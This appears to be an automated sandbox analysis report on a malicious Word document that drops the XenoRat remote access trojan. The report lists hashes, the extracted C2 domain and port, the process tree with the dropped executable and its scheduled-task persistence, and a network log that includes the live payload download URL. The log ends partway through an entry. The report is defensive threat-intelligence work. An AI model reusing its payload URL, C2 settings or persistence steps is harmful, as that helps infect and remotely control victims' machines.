Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-12-2024 09:46

General

  • Target

    ec6627e48bb4c56abbb2a4563072e631.doc

  • Size

    191KB

  • MD5

    ec6627e48bb4c56abbb2a4563072e631

  • SHA1

    9e237643473c67940eb359bba09825114c7bc726

  • SHA256

    548212f42d5dc4965db354d6ce075422dcb3331a213fb0b5b662e08e59234829

  • SHA512

    4fb47dcf9e0fe13e038a88cc8c9e06ff1dde996d69281c505a07c3d4cc591e32770c1df8dac3da8d031f4868073ebde8202a7173dfd369b016aa2c69af2385a3

  • SSDEEP

    3072:Q877VGZ5Sd3b4e0wNZtsqXNKd5AvDJW4S+I/tZ6X1bpF6m+3b:9GZYwAZHMCDJ8/u5pAm0b

Malware Config

Extracted

Family

xenorat

C2

dns.stipamana.com

Mutex

Xeno_rat_nd8912d

Attributes
  • delay

    12000

  • install_path

    appdata

  • port

    4567

  • startup_name

    mrec

Signatures

  • Detect XenoRat Payload 1 IoCs
  • XenorRat

    XenorRat is a remote access trojan written in C#.

  • Xenorat family
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 8 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ec6627e48bb4c56abbb2a4563072e631.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1560
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\RUSYZH.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\RUSYZH.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2388
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\RUSYZH.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\RUSYZH.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4120
        • C:\Users\Admin\AppData\Roaming\UpdateManager\RUSYZH.exe
          "C:\Users\Admin\AppData\Roaming\UpdateManager\RUSYZH.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1160
          • C:\Users\Admin\AppData\Roaming\UpdateManager\RUSYZH.exe
            C:\Users\Admin\AppData\Roaming\UpdateManager\RUSYZH.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:3068
          • C:\Users\Admin\AppData\Roaming\UpdateManager\RUSYZH.exe
            C:\Users\Admin\AppData\Roaming\UpdateManager\RUSYZH.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:4548
          • C:\Users\Admin\AppData\Roaming\UpdateManager\RUSYZH.exe
            C:\Users\Admin\AppData\Roaming\UpdateManager\RUSYZH.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:1808
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\RUSYZH.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\RUSYZH.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1672
        • C:\Windows\SysWOW64\schtasks.exe
          "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\Admin\AppData\Local\Temp\tmpCC49.tmp" /F
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:3276
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\RUSYZH.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\RUSYZH.exe
        3⤵
        • Executes dropped EXE
        PID:5100
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 80
          4⤵
          • Program crash
          PID:1496
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5100 -ip 5100
    1⤵
      PID:4508

    Network

    • flag-us
      DNS
      228.249.119.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      228.249.119.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      roaming.officeapps.live.com
      WINWORD.EXE
      Remote address:
      8.8.8.8:53
      Request
      roaming.officeapps.live.com
      IN A
      Response
      roaming.officeapps.live.com
      IN CNAME
      prod.roaming1.live.com.akadns.net
      prod.roaming1.live.com.akadns.net
      IN CNAME
      eur.roaming1.live.com.akadns.net
      eur.roaming1.live.com.akadns.net
      IN CNAME
      frc-azsc-000.roaming.officeapps.live.com
      frc-azsc-000.roaming.officeapps.live.com
      IN CNAME
      osiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.com
      osiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.com
      IN A
      52.109.68.129
    • flag-fr
      POST
      https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
      WINWORD.EXE
      Remote address:
      52.109.68.129:443
      Request
      POST /rs/RoamingSoapService.svc HTTP/1.1
      Cache-Control: no-cache
      Connection: Keep-Alive
      Pragma: no-cache
      Content-Type: text/xml; charset=utf-8
      User-Agent: MS-WebServices/1.0
      SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
      Content-Length: 511
      Host: roaming.officeapps.live.com
      Response
      HTTP/1.1 200 OK
      Cache-Control: private
      Content-Type: text/xml; charset=utf-8
      Server: Microsoft-IIS/10.0
      X-OfficeFE: RoamingFE_IN_363
      X-OfficeVersion: 16.0.18315.30575
      X-OfficeCluster: frc-000.roaming.officeapps.live.com
      Content-Security-Policy-Report-Only: script-src 'nonce-K6elRgAT3DqKzsOlZaz6me0L9V/8U4ep1h9CNfpu0Pw/ODMmRe95PTj5D1SLebtDP5jUOkITL49GBu7Upiahx9CaVCcL2ZWwU/+7Rbwi3mLFf8DoT6cKIAee2sL8qWM0lz2g7xkDvyYvfnuCUh1RCPoqrlpCzRtS7FVh0/53nF8=' 'unsafe-inline' 'unsafe-eval' 'strict-dynamic' https:; base-uri 'self'; object-src 'none'; require-trusted-types-for 'script'; report-uri https://csp.microsoft.com/report/OfficeIce-OfficeRoaming-Prod
      X-CorrelationId: cb7fc9c5-4350-4d44-9407-05face7d72ae
      X-Powered-By: ASP.NET
      Date: Wed, 11 Dec 2024 09:46:27 GMT
      Content-Length: 654
    • flag-us
      DNS
      www.stipamana.com
      WINWORD.EXE
      Remote address:
      8.8.8.8:53
      Request
      www.stipamana.com
      IN A
      Response
      www.stipamana.com
      IN A
      94.156.167.57
    • flag-bg
      GET
      https://www.stipamana.com/tysrerterseyuerthreytwsydtryerytsrt/gszgdargaerwgsergtsegregwa/ghtghdfgstrsrththsgthw/adzhtcfdhxfxgh.exe
      WINWORD.EXE
      Remote address:
      94.156.167.57:443
      Request
      GET /tysrerterseyuerthreytwsydtryerytsrt/gszgdargaerwgsergtsegregwa/ghtghdfgstrsrththsgthw/adzhtcfdhxfxgh.exe HTTP/1.1
      Accept: */*
      Accept-Language: en-us
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: www.stipamana.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Wed, 11 Dec 2024 09:46:28 GMT
      Content-Type: application/octet-stream
      Content-Length: 137216
      Last-Modified: Wed, 11 Dec 2024 05:44:57 GMT
      Connection: keep-alive
      Keep-Alive: timeout=60
      ETag: "675926d9-21800"
      Expires: Thu, 31 Dec 2037 23:55:55 GMT
      Cache-Control: max-age=315360000
      Accept-Ranges: bytes
    • flag-us
      DNS
      r10.o.lencr.org
      WINWORD.EXE
      Remote address:
      8.8.8.8:53
      Request
      r10.o.lencr.org
      IN A
      Response
      r10.o.lencr.org
      IN CNAME
      o.lencr.edgesuite.net
      o.lencr.edgesuite.net
      IN CNAME
      a1887.dscq.akamai.net
      a1887.dscq.akamai.net
      IN A
      88.221.134.137
      a1887.dscq.akamai.net
      IN A
      88.221.135.105
      a1887.dscq.akamai.net
      IN A
      88.221.135.97
      a1887.dscq.akamai.net
      IN A
      88.221.134.144
      a1887.dscq.akamai.net
      IN A
      88.221.135.114
      a1887.dscq.akamai.net
      IN A
      88.221.134.115
    • flag-gb
      GET
      http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgQUsVgYl9LUpmCNM7IJkm3dFg%3D%3D
      WINWORD.EXE
      Remote address:
      88.221.134.137:80
      Request
      GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgQUsVgYl9LUpmCNM7IJkm3dFg%3D%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: r10.o.lencr.org
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Content-Type: application/ocsp-response
      Content-Length: 504
      ETag: "79E03F91CD6E7129DCDC2E05D5346BDA380DF73D99C46BFCEEFEC6E0436B6503"
      Last-Modified: Wed, 11 Dec 2024 05:48:00 UTC
      Cache-Control: public, no-transform, must-revalidate, max-age=7287
      Expires: Wed, 11 Dec 2024 11:47:55 GMT
      Date: Wed, 11 Dec 2024 09:46:28 GMT
      Connection: keep-alive
    • flag-us
      DNS
      129.68.109.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      129.68.109.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      23.159.190.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      23.159.190.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      57.167.156.94.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      57.167.156.94.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      168.245.100.95.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      168.245.100.95.in-addr.arpa
      IN PTR
      Response
      168.245.100.95.in-addr.arpa
      IN PTR
      a95-100-245-168deploystaticakamaitechnologiescom
    • flag-us
      DNS
      137.134.221.88.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      137.134.221.88.in-addr.arpa
      IN PTR
      Response
      137.134.221.88.in-addr.arpa
      IN PTR
      a88-221-134-137deploystaticakamaitechnologiescom
    • flag-us
      DNS
      12.173.189.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      12.173.189.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      196.249.167.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      196.249.167.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      metadata.templates.cdn.office.net
      WINWORD.EXE
      Remote address:
      8.8.8.8:53
      Request
      metadata.templates.cdn.office.net
      IN A
      Response
      metadata.templates.cdn.office.net
      IN CNAME
      templatesmetadata.office.net
      templatesmetadata.office.net
      IN CNAME
      templatesmetadata.office.net.edgekey.net
      templatesmetadata.office.net.edgekey.net
      IN CNAME
      e26769.dscb.akamaiedge.net
      e26769.dscb.akamaiedge.net
      IN A
      92.123.26.202
      e26769.dscb.akamaiedge.net
      IN A
      92.123.26.161
    • flag-gb
      GET
      https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C
      WINWORD.EXE
      Remote address:
      92.123.26.202:443
      Request
      GET /client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: metadata.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Type: text/xml
      Server: Kestrel
      Content-Encoding: gzip
      Content-Length: 1264
      Cache-Control: max-age=66042
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Vary: Accept-Encoding
    • flag-us
      DNS
      binaries.templates.cdn.office.net
      WINWORD.EXE
      Remote address:
      8.8.8.8:53
      Request
      binaries.templates.cdn.office.net
      IN A
      Response
      binaries.templates.cdn.office.net
      IN CNAME
      binaries.templates.cdn.office.net.edgesuite.net
      binaries.templates.cdn.office.net.edgesuite.net
      IN CNAME
      a1847.dscg2.akamai.net
      a1847.dscg2.akamai.net
      IN A
      2.19.252.161
      a1847.dscg2.akamai.net
      IN A
      2.19.252.143
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp02835233.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 46413
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: xFXEvEvsng2mfE0eU+RtWg==
      Last-Modified: Fri, 22 Apr 2016 16:09:25 GMT
      ETag: 0x8D36AC879BBB45C
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: bcca83ea-301e-000c-1015-b91d22000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp01840907.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 43653
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 2jOARYFw5gy+pyYC/dDZVQ==
      Last-Modified: Fri, 22 Apr 2016 16:08:15 GMT
      ETag: 0x8D36AC84F8E1FB0
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: d47d4a02-201e-00a9-0e0f-ba4b58000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp03328884.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 22008
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: q78QzulIDkHYEnfpU4+Yyw==
      Last-Modified: Fri, 22 Apr 2016 16:10:17 GMT
      ETag: 0x8D36AC8987823BE
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: f3206081-b01e-0002-7f97-a03492000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp02851216.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 34816
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: YoYxJM3NoTXswOcieCy4iA==
      Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
      ETag: 0x8D36AC8813CE0D3
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 4196af4e-901e-003f-4990-2d48e6000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp0309043001.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 307348
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: DrxFqg5nzENdB0VDg3H5SA==
      Last-Modified: Wed, 29 Aug 2018 18:20:24 GMT
      ETag: 0x8D60DDC169CBCB0
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 875b64ee-b01e-0079-1097-a05123000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp02851217.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 33610
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: UYBOJVxXMXYDn01bVcEqsg==
      Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
      ETag: 0x8D36AC881987151
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 0171b447-f01e-005b-359a-1db97e000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp02851218.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 31835
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: kqgZ1DSoquosZfDMLzO7Og==
      Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
      ETag: 0x8D36AC881E66CE5
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 7ac92116-501e-008c-3524-b9e224000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp0403393701.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 3256855
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: iGe99fx1Tanab1ujQTNFlQ==
      Last-Modified: Wed, 29 Aug 2018 18:19:43 GMT
      ETag: 0x8D60DDBFE4BB50C
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 1aa38d20-a01e-00b7-6997-a0a780000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:46 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp02851227.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 31471
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: karb7EFxz6gpK2GEkvXvNA==
      Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
      ETag: 0x8D36AC8848A0495
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: c81084a1-301e-0023-0625-b910e9000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp0403392701.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 2527736
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 8laspQm0xsAUTSeMcDawqA==
      Last-Modified: Wed, 29 Aug 2018 18:18:47 GMT
      ETag: 0x8D60DDBDD02F94A
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 0e86dec0-501e-00d1-55b9-b9e8a0000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp02851219.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 31605
